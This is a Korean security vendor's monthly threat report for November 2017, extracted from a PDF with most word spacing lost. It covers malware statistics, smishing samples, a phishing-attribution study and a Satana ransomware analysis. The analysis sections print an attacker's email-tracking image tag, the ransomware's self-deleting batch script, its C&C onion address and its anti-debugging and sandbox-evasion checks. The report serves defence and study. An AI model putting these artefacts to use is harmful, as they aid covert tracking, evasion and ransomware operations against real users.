01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 년예상보안이슈 Top5 문서파일취약점공격과한국

Transcription

1 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No

2 01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 년예상보안이슈 Top5 문서파일취약점공격과한국가상화폐거래자대상공격간의연관성분석 03 악성코드분석보고 개요 악성코드상세분석 결론 04 해외보안동향 영미권 중국 일본

3 이스트시큐리티보안동향보고서 01 악성코드통계및분석 악성코드동향알약악성코드탐지통계허니팟 / 트래픽분석알약 M 스미싱분석 1

4 01 악성코드통계및분석 1. 악성코드동향 11 월에는랜섬웨어이슈는물론, 여러가지심각한취약점이슈가많이발견되었던달이었습니다. 랜섬웨어동향에서는코드난독화기능을포함하여실행파일의전체경로대조및시스템의모든활성화된프로세스체크로분석을어렵게만들게한 Sage 랜섬웨어의새로운변종이발견되었습니다. 그외에도미국, 영국, 남아프리카, 인도, 필리핀등의기업을공격했던 LockCrypt 랜섬웨어가 Satan RaaS(Ransomware as a Service) 포털에서생성된랜섬웨어와관련성이있다는정보가확인되기도하였습니다. 취약점이슈에서가장큰이슈는사용자와의상호작용없이도악성코드를설치할수있었던 MS 오피스의취약점이 17 년만에발견된부분입니다. 이취약점은 MS 오피스가 OLE 문서를삽입하고편집하는데사용하는특정컴포넌트에서발견되었습니다. 문제가되는컴포넌트가메모리에서오브젝트들을적절하게처리하는데실패하여공격자가로그인한사용자권한으로악성코드를실행하도록원격코드실행을허용합니다. 비교적큰취약점이므로반드시패치가이뤄져야하는내용입니다. 마이크로소프트에서 11 월에해당오피스취약점에대한패치를업데이트하였기때문에최대한빠르게패치를적용하고, 보안관리자는해당컴포넌트가또다른공격에의해악용될소지가있는이슈이므로비활성화처리를진행하는부분을권해드립니다. 발견된 MS 오피스취약점은이뿐이아닙니다. MS 오피스에서제공하는프로그램간데이터를공유하기위한 DDE(Dynamic Data Exchange) 기능을악용하는악성코드유포가 11 월초에발견된데이어, MS 워드문서에숨겨진스스로를복제가능한악성코드를생성하는기술이확인되기도하였습니다. 아직해당기술이실제공격에활용된사례는발견되지않았으나, 공개된내용을살펴봤을때윈도레지스트리수정으로사용자가모든 MS 오피스관련매크로를신뢰하는동시에, 보안경고없이허가받지않은상태로도모든코드를실행할수있었습니다. 이취약점이악용된다면자신도모르게악성코드가포함된문서를다른사용자들에게퍼뜨릴수있으며, 주변의동료나지인에게전달되는과정에서추가적인공격벡터가될수있기때문에주의가필요해보입니다. 또한, 글로벌업체의기업용프린터에서모든인쇄작업과 PIN 코드로보호된인쇄작업들의내용까지도접근할수 있도록경로조작이가능한취약점및악성 DLL 파일을업로드하여원격에서임의코드실행이가능한취약점이발견된 사례도있었습니다. 연말을맞아한해를정리하고다음해를준비하는과정에서여러가지문서 / 보고서작업이이뤄지고다양한데이터가 오고가는시점이기때문에더욱주의가필요합니다. 항상사용중인소프트웨어에대한최신패치를잊지않으시길 당부드립니다. 2

5 01 악성코드통계및분석 2. 알약악성코드탐지통계 감염악성코드 TOP 년 11 월의감염악성코드 Top 15 리스트에서는지난 10 월에각각 1, 2위를차지했던 Trojan.HTML.Ramnit.A 와 Trojan.Agent.gen 이 11 월 Top 15 리스트에서도동일한순위를보였으며, 특히 Trojan.Agent.Gen 은지난달과비교하여거의 2배에가까운감염수치를기록했다. 전체감염수는소폭하강했다. 순위 등락 악성코드진단명 카테고리 합계 ( 감염자수 ) 1 - Trojan.Agent.gen Trojan 2,389, Trojan.HTML.Ramnit.A Trojan 421, Trojan.LNK.Gen Trojan 404, Adware.SearchSuite Adware 366, Misc.Keygen Trojan 227, Backdoor.Generic Backdoor 219, Win32.Neshta.A Trojan 201, Exploit.CVE Gen Exploit 195, Misc.Riskware.BitCoinMiner Trojan 182, Worm.ACAD.Bursted.doc.B Worm 156, Backdoor.Agent.Orcus Backdoor 152, Adware.GenericKD Adware 144, New Misc.HackTool.AutoKMS Trojan 113, New Gen:Variant.Ransom.Locky.183 Trojan 83, New Win32.Ramnit.N Trojan 80,756 * 자체수집, 신고된사용자의감염통계를합산하여산출한순위임 2017 년 11 월 01 일 ~ 2017 년 11 월 30 일 3

6 01 악성코드통계및분석 악성코드유형별비율 악성코드유형별비율에서트로이목마 (Trojan) 유형이가장많은 76% 를차지했으며애드웨어 (Adware) 유형이 10% 로 그뒤를이었다. 웜 3% 취약점 4% 애드웨어 10% 백도어 7% 트로이목마 76% 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 취약점 (Exploit) 웜 (Worm) 기타 (Etc) 백도어 (Backdoor) 바이러스 (Virus) 하이재커 (Hijacker) 호스트파일 (Host) 카테고리별악성코드비율전월비교 11 월에는 10 월에비해트로이목마유형의악성코드비율이크게증가하였으며, 트로이목마유형의악성코드를 제외하고는전체적인감염악성코드수치는소폭으로감소하였다. 100% 100% 트로이목마 (Trojan) 스파이웨어 (Spyware) 0% 0% 61% 76% 애드웨어 (Adware) 10% 13% 하이재커 (Hijacker) 0% 0% 웜 (Worm) 3% 3% 11 월 취약점 (Exploit) 4% 4% 10 월 바이러스 (Virus) 0% 0% 백도어 (Backdoor) 7% 8% 호스트파일 (Host) 0% 7% 기타 (Etc) 0% 4% 0% 20% 40% 60% 80% 100% 4

7 01 악성코드통계및분석 3. 허니팟 / 트래픽분석 11 월의상위 Top 10 포트 허니팟 / 정보수집용메일서버를통해유입된악성코드가사용하는포트정보및악성트래픽을집계한수치 81 2% % % % % % 80 1% % 25 12% 23 58% 최근 3 개월간상위 Top 5 포트월별추이 2017 년 9 월 2017 년 10 월 2017 년 11 월

8 01 악성코드통계및분석 악성트래픽유입추이 외부로부터유입되는악의적으로보이는트래픽의접속시도가감지된수치 13,039,948 10,091,035 4,271,788 6,571,540 2,199,317 2,455, 년 6 월 2017 년 7 월 2017 년 8 월 2017 년 9 월 2017 년 10 월 2017 년 11 월 단위 : 악의적트래픽접속시도감지건수 2017 년 6 월 ~ 2017 년 11 월 6

9 01 악성코드통계및분석 4. 알약 M 스미싱분석 알약안드로이드를통한스미싱신고현황 기간 총신고건수 2017 년 11 월 01 일 ~ 2017 년 11 월 30 일 3,695 건 키워드별신고내역 키워드 신고건수 비율 예식 % 장소 % 오시는길 % 결혼 % 대한통운 % 확인하기 % 운송장 % 불법주정차 % 청첩장 % 첫돌 % 스미싱신고추이 지난달스미싱신고건수 2,462 건대비이번달 3,695 건으로알약안드로이드스미싱신고건수가전월대비 1,233 건증가했다. 이번달은예식관련스미싱이대부분을차지했으며, 불법주정차관련스미싱이새로등장했다. 7

10 01 악성코드통계및분석 알약이뽑은 11 월주목할만한스미싱 특이문자 순위 문자내용 1 [Web 발신 ] 고객님보험료미납으로인해추가출금일정및미납내역안내드립니다. 내역보기 : 2 [Web 발신 ] 더자세한것은 3 빨 ^ 리 ^ 가 ^ 봐 ^ 봐여 ^ 기왜 ^ 니 ^ 사진 ^ 있지? 다수문자 순위 문자내용 1 예식일시 : 오시는길 2 [Web 발신 ] 장소 3 [Web 발신 ] 오시는길 4 저결혼합니다 ^^ 예식일시 : 예식장소 : 5 [Web 발신 ]{CJ 대한통운 } 운송장번호 {6278*2} 미확인.. 반송처리주소확인 6 [Web 발신 ] 확인하기 7 [Danger] [Web 발신 ][CJ 대한통운 ] 운송장번호 [75*09] 주소지미확인.. 반송처리주소확인. 8 [Doubt] [Web 발신 ] 불법주정차 (1711- 이-2504) 적발되어안내드립니다. 이미지 > 민원내역 > 9 [Web 발신 ] 2016 년7월15일르네상스웨딩홀위치및청첩장클릭해주세요 10 [Web 발신 ] ^^우리아기첫돌^^10 월29일오후 :6시아네스웨딩컨벤션9층바로가기 8

11 이스트시큐리티보안동향보고서 02 전문가보안기고 년되돌아봐야할보안이슈 Top5 : RISEN 2. 지능화된타깃공격, 고도화된대응방안으로맞서야 9

12 02 전문가보안기고 년예상보안이슈 Top5 이스트시큐리티시큐리대응센터 (ESRC) 는곧다가올 2018 년주의해야할예상보안이슈 Top 5 를선정하였습니다. 1. 암호화화폐관련침해사고증가최근글로벌사이버환경에서는암호화 ( 가상 ) 화폐가가장큰이슈중하나이며, 2018 년에는이와관련한침해사고가급증할것으로예상됩니다. 이미 2017 년하반기부터관련침해사고가본격적으로발생하기시작했고, 앞으로공격자들이좀더적극적으로암호화화폐와관련된공격을시도할것으로보입니다. 암호화화폐에적용된블록체인기술자체는해킹이거의불가능하기때문에, 공격자들은암호화화폐를거래하는개개인들의지갑또는거래소를노릴것으로예상되며, 거래시인증을위한타인의자격증명을훔치려는시도가눈에띄게증가할것으로보입니다. 국내암호화화폐거래소출금알림이메일로사칭한피싱공격및거래소관계자를대상으로입사지원으로위장한스피어피싱공격사례가발견된바와같이, 암호화화폐또는거래소관련한공격이다양한방식으로이루어질가능성이높을것으로예상됩니다. 2. 클라우드서비스의증가에따른관련침해사고증가클라우드서비스는모바일기기, 개인 PC 뿐만아니라기업환경에서사용하는서버또는업무시스템에이르기까지, 개인혹은기업이사용하는콘텐츠를보관해주고제3자에게공유하는기능을제공하며우리실생활에자리잡았습니다. 상대적으로외부에서의접근이쉽기때문에, 2018 년에는가치가높은개인의민감한정보나금융정보, 기업의업무관련데이터를유출내지는파괴하려는시도가급증할것으로보입니다. 클라우드서비스는본인자격증명을통한계정로그인에의한접근이기본이기때문에, 계정정보관리와인증절차, 접근제어등다양한관점에서의침해사고예방이필요할것입니다. 3. 기업 SW 공급망공격에따른침해사고의증가 기업의 SW 공급망을타깃으로하는공격과이를통해악성코드를유포하는사례가증가할것으로예상됩니다. 최근발생하고있는사이버공격들은대부분금전적이득혹은기밀정보탈취를목적으로하고있으며, 공격자들은개인보다기업을공격목표로삼는것이더효과적이라고판단하고있습니다. 공격자가많은기업들이사용하는 SW 공급망을통해랜섬웨어와같은악성코드를유포하면, 한번에여러기업들에게때로는특정업종혹은특정기업에만악성코드를유포할수있어효과적인공격이가능합니다. 때문에 SW 공급망공격의증가와그에따른많은피해가발생할것으로예상됩니다. 10

13 02 전문가보안기고 4. 리눅스기반운영체제를노리는공격의증가리눅스기반 OS 를대상으로하는공격이증가할것으로예상됩니다. 리눅스기반 OS 는상대적으로안전하다고여겨져왔지만, 기기업체마다사용하는 OS 의종류나버전이다르기때문에이를모두지원하는보안솔루션이거의존재하지않습니다. 그렇기때문에서버관리자혹은 IoT 기기를사용하는사용자들이직접보안설정을해줘야하는어려움이있습니다. 최근에는기업들이일반적으로정보를저장해두는서버뿐만아니라각종 IoT 기기들에서도리눅스 OS 를사용하고 있어공격대상의수가증가했다고볼수있습니다. 이에따라한번격이성공할경우공격자가얻을수있는이득이 늘어난만큼, 리눅스 OS 를타깃으로하는공격이증가할것으로예상됩니다. 5. 랜섬웨어공격의지속및암호화화폐채굴악성코드의증가 사용자의데이터를암호화하여이를인질로잡고금전을요구하는랜섬웨어의공격이 2018 년에도지속될것으로 예상됩니다. 새로운랜섬웨어의등장보다는기존랜섬웨어들이변종형태로지속적으로나타날것으로보입니다. 또한전세계적으로암호화화폐의대한관심이높아짐에따라, 시스템을감염시킨뒤마이닝 ( 채굴 ) 봇을설치하고사용자모르게암호화화폐채굴을목적으로하는악성코드들이급증할것으로예상됩니다. 이러한마이닝악성코드들은최근비너스락커랜섬웨어제작였던공격자가가상화폐채굴공격을시도한사례처럼, 기존에랜섬웨어를유포하던공격자가랜섬웨어대신혹은동시에유포하는경우도나타날것으로보입니다. 11

14 02 전문가보안기고 2. 문서파일취약점공격과한국가상화폐 거래자대상공격간의연관성분석 잘아시다시피한국에서는다양한보안위협이발생하며침해사고로이어지고있습니다. 이러한사이버위협에는항상배후가존재하지만, 사이버세상의특성상공격자와거점을특정하고실체를규명하는 것은매우어려운일입니다. 하지만어떠한현상이나사건에는누구도의식하지못한사이특정코드가기록되거나, 평상시습관에의해고유한흔적을남겨결정적증거나단서로사용됩니다. 사이버공격자가제작한코드를분석하거나공격에활용된시스템, 네트워크, 사용언어등다양한환경과프로세스를 분석해공통점을찾아가는과정은많은시간과노력이필요합니다. 공격자의관심사와공격의도를고민하자! 각분야별침해위협을분석하고대응하는입장에서공격자의의도를우선고민하고이해하기위한노력은꽤중요합니다. 그래야만공격자의특성을보다정확히파악하고, 침해사고간유의미한연관자료를찾아신속하고정확한대응안마련에조금이나마도움을줄것입니다. 더불어특정분야별로오랜기간공격을지속한다거나, 타깃변화를시계열흐름에따라구분해연관성데이터를추적하는것도좋은요소가됩니다. 한국맞춤형문서파일취약점을활용한스피어피싱 (Spear Phishing) 공격 2017 년중순경대북관련분야에서활동하는한국의특정인을상대로문서파일취약점공격이수행됩니다. 이공격에사용된취약점은한국에서만주로발견되고있는 HWP 문서파일의취약점이사용되었고, 문서파일의지은이는 'SEIKO', 마지막으로저장한사람의계정은 'Lion' 입니다. [ 그림 1] 문서파일취약점작성에사용된공격자계정 12

15 02 전문가보안기고 그런데흥미롭게도이계정은지난 2015 년초한국의특정전력분야대상으로한스피어피싱공격에서식별된바있으며, 2016 년중순에는한국의특정연구기관을상대로한공격에도발견되었습니다. 거기에 2017 년에는 ' 문재인정부의탈핵선언비판 ' 내용의악성문서파일과 ' 경찰청사칭 ' 등한국맞춤형사이버위협에서최소 10 건이상발견됩니다. [ 그림 2] 한국전력분야대상공격에사용된계정명 해당계정의공격자가 2017 년주요공격대상으로삼았던곳은한국내통일, 안보, 탈북등대북관련분야에서 활동하고있다는공통점이존재합니다. 공격현장에남겨진디지털증거의방향을살펴보자 상기와같은계정측면의흔적외에도공격자를특정할수있는다양한침해지표를지정할수있습니다. 실제공격에 사용된원점을파악해유사공통점을찾는것입니다. 13

16 02 전문가보안기고 2017 년중순경공격자는대북관련분야의한국인을상대로스피어피싱공격을수행했고, 이공격에는감염대상자가해당위협에어느정도노출되고있는지체크하는기능이은밀히숨겨져있었습니다. 공격에사용된아이피주소는 ' ( 생략 )' 이며, 헤더내부에는 Content-Transfer-Encoding: base64 코드로인코딩된데이터가포함되어있습니다. 이데이터를디코딩하면한국의특정웹사이트로이미지소스태그가연결되고, PHP 명령에의해이메일열람한상황이전송됩니다. 또한발신자의아이피주소와이미지소스태그의호스트는동일한서버입니다. <img src=" 생략 )eng.co.kr/datum/img.php?id=(id)&emt=(host)&hx=99" border="0" width="0" /> 이런가운데 2017 년 12 월초동일한아이피주소에서한국포털사이트의계정보호기능안내로위장한피싱공격이 식별됩니다. [ 그림 3] 포털사이트계정도용방지를위한비밀번호입력위장피싱화면 그런데이공격은주로한국의특정가상화폐거래관계회원들에게발송된특징이있고, 우연하게도수년전부터안보, 통일, 국방, 대북관련분야관계자를겨냥해공격한스피어피싱공격지원점과일치합니다. 두공격의발신지 IP 주소가완벽하게일치하며, 발송서버가메일에부여하는고유식별자메시지 ID 값의도메인주소도 'sam( 생략 )eng.co.kr' 값으로동일하게사용되었습니다. 14

17 02 전문가보안기고 또한, 한국내가상화폐관계자들에게도문서파일취약점을활용한공격은지난수개월간지속적으로이어지고 있습니다. [ 그림 4] 한국가상화폐거래소관계자나회원을대상으로유포된악성문서파일화면 지난수년간한국의기반시설과안보, 통일, 국방, 금융, 대북관련단체등을대상으로은밀한침투를꾸준히시도하던 공격자가한국의가상화폐거래회원들을상대로도피싱공격수행할가능성이높은대목입니다. 이처럼한국을대상으로한공격이다양한형태로변모하고있다는점을명심하고, 수신된이메일의경우항상 주의하는보안습관이필요하겠습니다. 15

18 이스트시큐리티보안동향보고서 03 악성코드분석보고 개요 악성코드상세분석 결론 16

19 03 악성코드분석보고 [Trojan.Ransom.Satana] 악성코드분석보고서 1. 개요 작년 7월 4일사용자의마스터부트레코드 (MBR) 를암호화하여 PC 실행을막는 Satana 랜섬웨어가처음등장하였다. 이는 MBR 을망가뜨리는 Petya 랜섬웨어와클래식랜섬웨어를결합한새로운형태의랜섬웨어였다. 그러나모든파일은동일특정키로암호화된다거나, 디버그스트링을남기는등결점을포함하고있어개발초기단계의버전으로보였다.( 그러나올해등장한 Satana 랜섬웨어는 Ransomware as a Service(RaaS) 형태로진화했으며다양한안티디버깅 기법과프로세스인젝션등클래식랜섬웨어기능에분석을어렵게하기위한다양한기법들을포함하고있다. 본분석 보고서에서는더욱강력하게업데이트된 Satana 랜섬웨어를상세분석하고자한다. 17

20 03 악성코드분석보고 2. 악성코드상세분석 2.1. 동작프로세스 [ 그림 1] 동작프로세스 D1D76720AE326CCC704C182ABE0CA35 분석 분석을방해하기위한여러가지안티디버깅기법을포함하고있으며실제악성파일을드롭하는역할을한다. 1) 다양한안티디버깅기법 satana 랜섬웨어는총 20 가지의안티분석기법이적용되어있다. 안티분석기법에는안티디버깅과안티 VM 을확인하는기능들로나뉜다. 각각의기법들은이미오래전부터악성프로그램에서사용했던방법이기는하나 20 가지의기법이한번에적용된랜섬웨어라는점에서기존랜섬웨어와는다른차이점을보인다. 18

21 03 악성코드분석보고 [ 그림 2] 안티디버깅기법중일부코드 다음은적용된기법들이다. 안티디버깅기법 설명 1 BlockInput() 함수호출 BlockInput() 함수가호출되면키보드와마우스입력이차단되어분석가의정상적인 분석을방해한다. 2 AVG 모듈확인 해외안티바이러스제품인 AVG Internet Security 에서사용하는 avghookx.dll, avghooka.dll 모듈이사용중인지확인한다. 19

22 03 악성코드분석보고 FindWindowW 함수를호출하여현재디버거가실행중인지확인한다. 비교대상은 이미잘알려진디버거들이다. 3 각종디버거확인 - OLLYDBG, WinDbgFrameClass, Immunity Debugger, Zeta Debugger, Rock Debugger, ObsidianGUI 4 KdDebuggerEnabled 확인 KdDebuggerEnabled 값을확인하여현재시스템이커널디버깅중인지확인한다. 5 IsDebuggerPresent, CheckRemoteDebuggerPresent 함수호출 IsDebuggerPresent 함수를호출하여현재프로세스가디버깅당하는중인지 확인하고, CheckRemoteDebuggerPresent 를통해특정프로세스가디버깅당하는지 확인한다. 가상화프로세스및 Antivirus 에서사용하는모듈을확인하여디버깅유무를확인한다. 6 가상화모듈및 Antivirus 모듈체크 - SandBoxie, Kaspersky Antivirus, Avast Antivirus, SunBelt SandBox, Virtual PC, WPE Pro 분석가들이주로사용하는프로세스목록을토대로프로세스검색을통해현재분석 환경인지확인한다. - ollydbg.exe, ProcessHacker.exe, tcpview.exe, autoruns.exe,autorunsc.exe, 7 분석툴사용확인 filemon.exe, procmon.exe, procexp.exe, idaq.exe, idaq64.exe, ImmunityDebugger.exe, Wireshark.exe, dumpcap.exe, HookExplorer.exe ImportREC.exe, PETools.exe, LordPE.exe, SysInspector.exe, proc_analyser.exe, sysanalyzer.exe, sniff_hit.exewindbg.exe, joeboxcontrol.exe, joeboxserver.exe, netmon.exe GetProcAddress 함수를호출하여 kernel32.dll 의 export 된 8 Wine 샌드박스환경확인 wine_get_unix_file_name 의주소를검색한다. 리턴값을통해 Wine 샌드박스 환경인지확인한다. 20

23 03 악성코드분석보고 비정상적인핸들값 0x 을가진 NtClose 와 CloseHandle 함수를호출하여 9 NTClose 와 CloseHandle 사용 디버깅환경인지확인한다. 만약비정상적인핸들값을사용했을경우 STATUS_INVALID_HANDLE (0xC ) 예외를호출한다. 10 VEH (Vectored Exception Handling) VEH 핸들을생성하고 int3 을호출하여디버깅을탐지한다. 11 후킹확인 CreateProcessW 와 DeleteFileW, LdrLoadDll, NtQueryInformationProcess 함수의점프 코드를확인하여후킹여부를확인한다. 12 csrss.exe 핸들을이용한 디버거확인 프로세스검색을통해 csrss.exe 프로세스의핸들을요청했을경우성공여부에따라 시스템프로세스가디버깅중인지확인한다 으로나누기 컴퓨터에서정수를 0 으로나눌수없다는점을이용하여예외를발생시켜디버깅을 방해한다. 14 OS 버전확인 RtlGetVersion 함수를호출하여 OS 버전정보를확인하고악성코드를실행할지 여부를결정한다. NTQuryInformationProcess 함수를호출하여디버깅환경인지확인한다. - ProcessDebugPort,(0x07) 15 NTQuryInformationProcess 함수호출 - ProcessDebugObjectHandle(0x1E) - ProcessDebugFlags(0x1F) 또한 devenv.exe 프로세스를검색하여개발소프트웨어인 VisualStudio 프로그램이 동작중인지확인한다. 16 Hardware BreakPoint 확인 GetThreadContext 함수를호출하여디버그레지스터값 (Dr0 ~ DR3) 을체크하여 디버깅유무를확인한다. 17 sample.exe 파일이름확인현재실행되는파일이름이 sample.exe 를사용하는지확인한다. 21

24 03 악성코드분석보고 18 C:\insideTM 폴더확인 현재실행되는파일이 Anubis 샌드박스에서사용하는경로인 C:\insideTM\ 하위에서 실행되고있는지확인한다. 샌드박스환경에서사용하는사용자계정들을비교하여현재해당계정이로그온되어 19 사용자계정확인 있는지확인하여디버깅유무를확인한다. - SANDBOX, MALTEST, MALWARE, VIRUS, TEQUILABOOMBOOM 20 폴더경로확인 현재실행되는파일의경로를확인하여디버깅환경인지확인한다. - SAMPLE, VIRUS, SANDBOX [ 표 1] 안티디버깅기법 2) 프로세스인젝션후파일드롭자기자신을자식프로세스로실행한다. 이때 Process Hollowing 기법을이용해서자기자신프로세스에인젝션한뒤 %appdata% 경로에랜덤폴더명과랜덤파일명.exe 파일을드롭하여악성행위를시작한다. 분석당시에는 %appdata%\gewaaq\heit.exe 이름으로생성되었다. 참고로 Process Hollowing 기법이란메모리안의정상 PE 를걷어내고그안에악성 PE 를채우는기법으로탐지를회피하기위해악성코드에서사용하는기법이다. 2.2 파일에서드롭되어실행되는 heit.exe 는 explorer.exe 에인젝션하여암호화기능을수행하며이후복호화해주는 대가로비트코인결제를유도한다. 1) 중복이벤트실행확인 중복되는이벤트실행을방지하기위해 Mutex 를사용한다. Mutex 의이름은사용자컴퓨터의 GUID 를이용하여 계산된값이며, 중복실행중이라면중복실행이벤트를종료한다. 이벤트가완료된후에는 ReleaseMutex 를호출한다. [ 그림 4] 중복이벤트실행확인 22

25 03 악성코드분석보고 2) 자가파일삭제를위한배치파일드롭및실행 %tmp%tmp_52ce971c.bat 파일을드롭한다. 내용을보면자신의원본파일과현재드롭한배치파일을삭제하는코드 이다. tmp_52ce971c.bat off :l del "C:\Users\[ 사용자계정 ]\Desktop\3D1D76720AE326CCC704C182ABE0CA35" if exist "C:\Users\[ 사용자계정 ]\Desktop\3D1D76720AE326CCC704C182ABE0CA35" goto l del /F "C:\Users\[ 사용자계정 ]\AppData\Local\Temp\tmp_52ce971c.bat" [ 표 2] 드롭된배치파일내용 3) 레지스트리등록 레지스트리시작프로그램에 %AppData% 에드롭한파일을등록한다. 이는재부팅될경우에도랜섬웨어를실행하기 위함이다. [ 그림 5] 레지스트리등록화면 4) C&C 접속암호화하기전아래 URL 에접속을한후암호화를진행한다. URL 정보 IP 정보 국가정보 dcwqsuh6dxnlsokm.onion.sx 한국 [ 표 3] C&C 정보 23

26 03 악성코드분석보고 [ 그림 6] C&C 접속 5) 암호화대상파일검색암호화대상에는모든논리드라이브를포함하며드라이브내에서암호화조건에부합하는파일들을리스팅한다. 암호화대상파일의확인조건은확장자, 제외파일및폴더문자열이다. 다음은제외대상경로와암호화대상확장자목록이다. 암호화제외대상경로문자열 windows, $recycle.bin, 암호화대상확장자 "qbx","csh","bco","ext","dtd","rtf","ly","tiff","moneywell","key","design","en","r3d","nx","ads","blend","xlsx","dxg","otg","3ds","idx","dac","cgm","html","qby","d oc","pl","ld","xml","asm","dds","wmv","sti","cfp","pot","potx","bdf","wb2","ott","cdrw","ds2","rdb","btw","mfw","pas","pdb","sxw","accdr","xltm","gen","odf","s da","sxi","des","bpw","bkf","acr","nsg","mp4","mdf","sxc","ldf","sd0","oil","fhd","cr2","cer","prf","sldasm","dotx","jsp","myd","dbjournal","fp7","bip","rw2","xlw","fdb","ccd","tif","kdc","p7b","fh","st6","phtml","rwz","ce2","c","rm","hpp","php","ffd","gry","apj","mov","flv","pages","mst","thm","erf","rat","nd","pab","cls","hbk","xla","bank","vhd","backup","flac","rwl","cs","tib","max","accdb","pptm","dxf","st4","gray","h","sas7bdat","sql","xlm","st8","p ef","otp","ef","nop","odt","nk2","crt","odc","msg","qbm","sldm","indd","awg","qbb","cfs","oth","agdl","svg","cpp","dwg","fpc","crw","csl","pspimage","erbsql", "vmdk","nxl","ach","adb","htm","ptx","bay","xlsm","docm","m","ps","wallet","sxm","pptx","cdr6","aspx","pem","pct","war","al","class","ai","ods","pcd","fxg","s wf","mdb","pst","sqlite","ddoc","cdx","asp","st5","3gp","st7","backupdb","jpe","ibz","nwb","ns2","ots","p7c","srt","avi","plc","qbr","ait","7z","123","odm","wav ","dcr","kbx","hp","cfx","java","ppsx","bak","iif","ppsm","k1","pfx","xlt","qba","psd","mpg","pps","djvu","sdf","nsd","craw","ns3","3fr","fmb","pdf","p12","php5", "tlg","x3f","orf","db3","act","exf","sldprt","tar","mdc","srf","qbw","dxb","jar","back","cib","ost","cdr","asx","xls","dbx","say","der","cdr5","rar","ksp","ddd","dc2","s sn","dbf","arw","db","gif","pbl","srw","spf","nsf","incpas","step","drf","zip","potm","sldx","ab4","dat","bgt","fpx","amd","m4v","wps","raf","nef","asf","dgc","mm w","stw","sqlite3","fff","bik","tex","jpeg","odb","py","stx","3dm","txt","ppt","xlsb","sxd","dot","png","xis","eml","jin","ppam","mef","dt","oab","xlr","yuv","ibank", "std","dcs","x11","ce1","bdb","xltx","lua","fla","drw","sr2","csv","ycbcra","odp","cdr3","ndd","tga","mos","nx2","sch","sxg","cdf","pdd","vob","ty","docx","3g2"," jpg","kpdx","cpi","wpd","accdt","accde","xd","bkp","pat","es","iiq","ns4","eps","ddrw","obj","nrw","raw","mp3","nsh","s3db","mrw","kdbx","grey","psafe3","c mt","3pr","dotm","cdr4","dng","odg","nyf","xlk","sqlitedb","xlam","ibd","kc2","vrb","ac","abk","dbk","bkn","bkc","fbw","tbk","bke","bb","sik","mbk","bpp","dtb ","vbk","rpb","fb","cvt","sbk","tjl","bup","fkc","old","wbk","jou","umb","spi","sav","bk","vib","swp" [ 표 4] 암호화제외대상경로및대상확장자 24

27 03 악성코드분석보고 6) 파일암호화 1 파일암호화에는 AES 256 를사용하고, AES Key 는 RSA2048 를이용하여암호화를한다. 2 암호화가완료되면아래와같이 [ 랜덤문자열 ].stn 이파일명과확장자명이생성된다. [ 그림 7] 파일암호화완료화면 3 암호화가완료된폴더에생성된 _HELP_DECRYPT_FILES.html 라는이름의랜섬노트를보면토르접속주소가있다. 한국어를포함한총 24 개의언어로되어있다. [ 그림 8] 랜섬노트화면 25

28 03 악성코드분석보고 3. 결론 이랜섬웨어의감염경로가명확히알려지지않았으나기존랜섬웨어감염경로인익스플로잇키트나사용자가 신뢰할만한기관을사칭한이메일로감염되었을것으로추정된다. 이번랜섬웨어는서비스형랜섬웨어 (Ransomware as a Service) 이다. 일반적으로는랜섬웨어제작자가곧공격자였다. 그러나 RaaS 의등장은제작자와공격자가따로존재한다. 제작자는별도비용을받지않고공격자개개인의요구에맞춘랜섬웨어를만들수있는웹페이지와진행상황추적등다양한편의를제공한다. 공격자는기술적능력, 비용없이도랜섬웨어공격을개시할수있고, 제작자는피해자가랜섬웨어금액을지불하면그금액의 30% 를지급받는형태이다. 또한이번랜섬웨어기존랜섬웨어와다르게다양한안티디버깅기법들과프로세스인젝션, 코드인젝션기법등을사용하여탐지회피및분석가들의분석을어렵게하기위한방법들을사용한다는특징이있다. 랜섬노트는한국어를포함한이탈리아어, 아랍어등 24 개의다양한언어를지원한다. 현재제작자들은지속적으로코드를수정하며업데이트를하고있기에다음위협의기반이될수도있다. 랜섬웨어를예방하기위해서는기본보안수칙을준수하고, 윈도, 애플리케이션을최신으로업데이트해야한다. 또한 중요한자료는정기적으로외장매체나클라우드서비스등에백업해서피해를최소화할수있도록해야한다. 26

29 이스트시큐리티보안동향보고서 04 해외보안동향 영미권 중국 일본 27

30 04 해외보안동향 1. 영미권 Vault 8: 위키리크스, CIA 의멀웨어제어시스템인 Hive 소스공개해 Vault 8: WikiLeaks Releases Source Code For Hive - CIA's Malware Control System Vault 7 시리즈를통해 CIA 의비밀스러운해킹툴프로젝트 23 건의세부사항들을공개한지 2 달만에, 위키리크스가 Vault 8 시리즈를발표했다. 위키리크스는이를통해 CIA 해커들이개발한백엔드인프라에대한소스코드와정보를 공개할예정이다. Vault 8 시리즈의첫번째로, 이들은 CIA 가은밀히악성코드를원격으로제어하기위해사용한백엔드컴포넌트인 Project Hive 의소스코드및개발로그를공개했다. 올 4 월위키리크스는 Project Hive 에대한간략한정보를공개해이프로젝트가악성코드와통신하고타깃에특정 작업을실행하도록명령을보내며타깃에서추출한정보들을수신하는고급 C&C 서버라는점을공개했다. Hive 는멀티유저올인원시스템으로다수의 CIA 요원들이원격으로다수의악성코드를제어하는데사용될수있다. Hive 의인프라는특히 VPN 을통한다단계통신후따라오는공개된가짜웹사이트를포함하는귀속을막기위해 설계되었다. 위키리크스는 타깃컴퓨터에서임플란트가발견되었더라도, Hive 를사용할경우악성코드와인터넷의다른서버와의 통신을살펴보는것만으로이를 CIA 와연관짓기는어려울것입니다. 고밝혔다. 다이어그램에서볼수있듯이, 이악성코드임플란트는상용 VPS( 가상프라이빗서버 ) 를이용한가짜웹사이트와직접 통신합니다. 이웹사이트는웹브라우저에서직접오픈했을때는무해해보인다. 28

